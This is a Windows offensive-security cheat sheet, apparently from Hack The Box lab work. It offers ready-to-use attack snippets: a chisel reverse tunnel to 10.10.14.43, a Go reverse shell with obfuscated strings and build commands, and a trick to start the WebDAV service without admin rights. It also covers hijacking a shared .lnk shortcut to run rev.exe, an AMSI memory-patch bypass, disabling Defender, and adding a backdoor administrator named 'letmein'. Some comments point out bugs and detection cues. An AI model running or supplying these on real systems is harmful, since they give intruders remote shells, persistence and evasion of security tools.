Windows

  1. Go to the folder your program is installed in, right click, select Send to > Desktop (Create shortcut)

  2. Press Win+R and enter %ProgramData%\Microsoft\Windows\Start Menu to open the Start Menu folder in Windows Explorer

  3. Move your new shortcut from the desktop to the Start Menu folder

  4. If desired, select the moved shortcut and press F2 to rename it and remove the " - Shortcut" suffix


Cronjobs

Start the job

Start-Job -ScriptBlock { & "./program.exe"; }

Start-Job -ScriptBlock { & "./chisel.exe" client 10.10.14.43:36000 R:socks; }

$job = Start-Job -ScriptBlock {
    & "./chisel.exe" client 10.10.14.43:36000 R:socks
}

Check the status of the job

Get-Job

Get-Job $id

Get-Job $job

Get the output of the job

Receive-Job

Receive-Job -Keep $id

Receive-Job -Keep $job

Stop the job if needed

Stop-Job

Stop-Job $id

Stop-Job $job

Remove the job from the job list

Remove-Job

Remove-Job $id

Remove-Job $job

Enable Web Dav

Source: HOW TO START A “TRIGGER START” WINDOWS SERVICE WITH POWERSHELL WITHOUT ELEVATION / ADMIN RIGHTS

# Compiles a small C# helper in-process and calls it once. The helper registers an ETW
# provider for the GUID below (per the linked write-up, the trigger the WebClient/WebDAV
# service is configured to start on), writes a single event to it and unregisters.
# Service trigger events are raised with EventWrite, which is why the write-up says this
# needs no elevation.
# NOTE(review): -CompilerParameters / System.CodeDom.Compiler are Windows PowerShell 5.1
# only; in PowerShell 7 Add-Type takes -CompilerOptions '/unsafe' instead.
$Source = @"
using System;
using System.Text;
using System.Security;
using System.Collections.Generic;
using System.Runtime.Versioning;
using Microsoft.Win32.SafeHandles;
using System.Runtime.InteropServices;
using System.Diagnostics.CodeAnalysis;
namespace JosL.WebClient {
  public static class Starter {
    [StructLayout(LayoutKind.Explicit, Size = 16)]
    public class EVENT_DESCRIPTOR {
      [FieldOffset(0)] ushort Id = 1;
      [FieldOffset(2)] byte Version = 0;
      [FieldOffset(3)] byte Channel = 0;
      [FieldOffset(4)] byte Level = 4;
      [FieldOffset(5)] byte Opcode = 0;
      [FieldOffset(6)] ushort Task = 0;
      [FieldOffset(8)] long Keyword = 0;
    }

    [StructLayout(LayoutKind.Explicit, Size = 16)]
    public struct EventData {
      [FieldOffset(0)]
      internal UInt64 DataPointer;
      [FieldOffset(8)]
      internal uint Size;
      [FieldOffset(12)]
      internal int Reserved;
    }

    public static void startService() {
      Guid webClientTrigger = new Guid(0x22B6D684, 0xFA63, 0x4578, 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7);

      long handle = 0;
      uint output = EventRegister(ref webClientTrigger, IntPtr.Zero, IntPtr.Zero, ref handle);

      bool success = false;

      if (output == 0) {
        EVENT_DESCRIPTOR desc = new EVENT_DESCRIPTOR();
        unsafe {
          uint writeOutput = EventWrite(handle, ref desc, 0, null);
          success = writeOutput == 0;
          EventUnregister(handle);
        }
      }
    }

    [DllImport("Advapi32.dll", SetLastError = true)]
    public static extern uint EventRegister(ref Guid guid, [Optional] IntPtr EnableCallback, [Optional] IntPtr CallbackContext, [In][Out] ref long RegHandle);

    [DllImport("Advapi32.dll", SetLastError = true)]
    public static extern unsafe uint EventWrite(long RegHandle, ref EVENT_DESCRIPTOR EventDescriptor, uint UserDataCount, EventData * UserData);

    [DllImport("Advapi32.dll", SetLastError = true)]
    public static extern uint EventUnregister(long RegHandle);
  }
}
"@
# /unsafe is required because EventWrite is declared with an EventData* pointer parameter.
$compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
$compilerParameters.CompilerOptions="/unsafe"
Add-Type -TypeDefinition $Source -Language CSharp -CompilerParameters $compilerParameters
# startService() is void: the EventRegister/EventWrite return codes are kept in local
# variables (output, success) and never surfaced, so this call gives no indication of
# whether the event was written. Confirm with `Get-Service WebClient` afterwards.
[JosL.WebClient.Starter]::startService()

Golang Reverse Shell

Author

Repo: https://github.com/gwillgues/Reverse-Shells.git
Revshell.go: https://github.com/gwillgues/Reverse-Shells/blob/main/revshell.go

Code

// Author: https://github.com/gwillgues/Reverse-Shells/blob/main/revshell.go
package main

import (
	"os/exec"
	"os"
	"net"
	"runtime"
)

func main() {
	// Positional arguments: os.Args[1] = host, os.Args[2] = port. Nothing checks len(os.Args),
	// so running with fewer than two arguments panics with an index out of range here.
	dst := os.Args[1]
	pnum := os.Args[2]
	connstring := dst + ":" + pnum
	prot := "tcp"
	// The Dial error is discarded. On failure netData is nil; exec.Cmd treats a nil
	// Stdin/Stdout/Stderr as the null device, so the shell below still starts but is
	// attached to nothing and the connection failure is never reported.
	netData, _ := net.Dial(prot, connstring)
	// NOTE: this local shadows the imported "os" package for the rest of main.
	os := runtime.GOOS
	// Concatenating constant fragments yields the same command as the plain literal.
	shell := exec.Command("/b" + "in" + "/b" + "ash")
	switch os {
		case "windows": shell = exec.Command("pow" + "ers" + "hell" + "." +  "e" + "xe")
		case "linux":   shell = exec.Command("/" + "b" + "in/" + "bas" + "h")
		// The return value is not assigned in this arm, so on darwin the initial
		// /bin/bash command from above is what actually runs.
		case "darwin":  exec.Command("/b" + "in" + "/z" + "s" + "h")
	}
	// All three standard streams of the child are the socket; Run blocks until the shell
	// exits and its error is ignored. On the host this is the classic detection signal:
	// an interactive shell whose stdin/stdout/stderr handles are a network socket.
	shell.Stdin = netData
	shell.Stdout = netData
	shell.Stderr = netData
	shell.Run()
}

Build

Build for Windows:

GOOS=windows GOARCH=amd64 go build -o rev.exe rev.go

Build for Linux:

go build -ldflags="-s -w" -o rev rev.go

Get product versions

PS C:\xampp\htdocs\internal> wmic product get caption,version # Took like a minute to complete...
Caption                                                         Version
Office 16 Click-to-Run Extensibility Component                  16.0.17126.20132
Office 16 Click-to-Run Licensing Component                      16.0.17126.20132
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.32.31332     14.32.31332
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.32.31332  14.32.31332
LibreOffice 5.2.6.2                                             5.2.6.2
DefaultPackMSI                                                  4.6.2.0
VMware Tools                                                    12.0.6.20104755
...

Check if UAC is active

*Evil-WinRM* PS C:\Users\maya> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
	...
	EnableLUA    REG_DWORD    0x1
	...

Watch File Changes

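# Counts FileSystemWatcher events per *.lnk path under $directory for two minutes, then
# prints one line per path. The hashtable is handed to the handler via -MessageData:
# an -Action block runs in its own scope, so a script-scope $accessLog is not updated
# reliably when this is run as a .ps1 (it only appears to work when pasted into an
# interactive session, where the variables are global).
$directory = "C:\Common Applications"
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = $directory
$watcher.Filter = "*.lnk"
$watcher.IncludeSubdirectories = $true
# LastAccess notifications depend on last-access updates being enabled on the volume
# (see `fsutil behavior query disablelastaccess`); otherwise only name changes fire.
$watcher.NotifyFilter = [System.IO.NotifyFilters]'FileName, LastAccess'
$accessLog = @{}
$action = {
    # $Event.MessageData is the hashtable passed at registration; it is a reference
    # type, so increments made here are visible to the script after the wait.
    $log = $Event.MessageData
    $filePath = $EventArgs.FullPath
    if ($log.ContainsKey($filePath)) { $log[$filePath]++ } else { $log[$filePath] = 1 }
}
# Give each subscription its own identifier so cleanup removes only these four
# subscribers and not every event subscriber in the session.
$subscribers = foreach ($eventName in 'Changed', 'Created', 'Deleted', 'Renamed') {
    Register-ObjectEvent -InputObject $watcher -EventName $eventName `
        -SourceIdentifier "LnkWatch.$eventName" -MessageData $accessLog -Action $action
}
try {
    $watcher.EnableRaisingEvents = $true
    Write-Output "Monitoring .lnk file access in $directory for 2 minutes..."
    Start-Sleep -Seconds 120
    Write-Output "Total .lnk file accesses in 2 minutes:"
    foreach ($file in $accessLog.Keys) {
        Write-Output "File: $file, Access Count: $($accessLog[$file])"
    }
}
finally {
    # Register-ObjectEvent -Action returns one job per subscription; unregister and
    # remove each, and release the watcher even if the wait was interrupted.
    foreach ($sub in $subscribers) {
        Unregister-Event -SourceIdentifier $sub.Name -ErrorAction SilentlyContinue
        Remove-Job -Id $sub.Id -Force -ErrorAction SilentlyContinue
    }
    $watcher.Dispose()
}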

Create Shortcut (lnk)

# Creates (or silently overwrites) the shortcut at $shortcutPath so that it launches
# $targetPath. Uses the WScript.Shell COM object: CreateShortcut only builds the
# shortcut object in memory; nothing is written to disk until Save() is called.
# For defenders: a .lnk in a shared folder whose target resolves to a user-writable
# location such as C:\Users\Public is exactly the change worth auditing for.
$shortcutPath = "C:\Common Applications\Notepad.lnk"
$targetPath = "C:\Users\Public\rev.exe"
$wscript = New-Object -ComObject WScript.Shell
$shortcut = $wscript.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.Save()

Bypass AMSI

# Author: Axura  
# URL: https://4xura.com/ctf/htb-writeup-mist/#toc-head-4  
  
# Reflects over the assembly that defines [Ref] for a type whose name ends in "siUtils",
# then over that type's non-public static fields for one ending in "siContext".
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'} 
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'} 
# Reads the field as a native pointer and copies one Int32 element (4 bytes, 0x000000ff)
# over whatever it points at. This is an in-process memory patch, and the reflection
# plus Marshal::Copy sequence is a pattern defenders can hunt for in script block logs.
[IntPtr]$c = $b.GetValue($null) 
[Int32[]]$d = @(0xff) 
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

Disable Defender

Source: https://www.liberiangeek.net/2023/11/how-to-disable-windows-defender-using-powershell/

Set-MpPreference -DisableRealtimeMonitoring $true

Get flags (HTB)

ls $ENV:USERPROFILE -fil *.txt -rec | % { $_.FullName; echo " "; cat $_.FullName }

Create new admin user

net user <username> <password> /add
net localgroup administrators <username> /add
net localgroup "Remote Management Users" <username> /add

runas /user:<domain\username> "<command>"

net user letmein Password123$ /add && net localgroup administrators letmein /add && net localgroup "Remote Management Users" letmein /add
runas /user:letmein "whoami"
